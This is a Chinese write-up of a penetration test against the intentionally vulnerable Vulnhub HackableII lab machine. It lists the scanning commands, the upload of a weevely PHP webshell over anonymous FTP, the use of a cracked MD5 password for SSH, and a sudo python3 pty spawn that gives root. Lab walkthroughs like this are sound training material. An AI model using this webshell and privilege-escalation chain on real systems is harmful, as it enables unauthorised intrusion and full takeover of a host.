Vulnhub:HackableII靶机渗透测试

 

一、环境介绍

渗透机:kali 2023

靶机:hackableII

靶机下载地址:https://download.vulnhub.com/hackable/hackableII.ova

二、信息收集

靶机IP:192.168.1.103

扫描靶机获取版本信息

nmap -sV 192.168.1.103

发现靶机80端口开启http服务,登录靶机网址

查看页面源代码发现提示

Do you like gobuster? dirb? etc...

扫描一下网站目录

ffuf -u http://192.168.1.103//FUZZ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -ic -c -e .php,.txt,.html 

发现一个files,访问一下有点像ftp页面

三、渗透测试

匿名登录一下靶机ftp

登录成功,我们用weevely工具生成一个名为shell.php密码为passwd的webshell文件

weevely generate passwd ./shell.php

用ftp上传webshell

put shell.php

刷新一下可以看到网页已经多了一个shell.php文件


我们用weevely工具连接webshell获取靶机shell

weevely http://192.168.1.103/files/shell.php passwd

我们在靶机目录里找一下可疑文件

 

在home目录里发现一个/.runme.sh文件,查看后发现一个md5值应该是密码,md5解密一下

cf4c2232354952690368f1b3dfdfb24d

看到靶机还开着ssh服务,我们远程连接一下,账号用文件查看到的:shrek 密码:onion

ssh shrek@192.168.1.103

sudo提权

sudo /usr/bin/python3.5 -c 'import pty;pty.spawn("/bin/bash")'

成功拿到靶机root权限,实验结束

  • 10
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值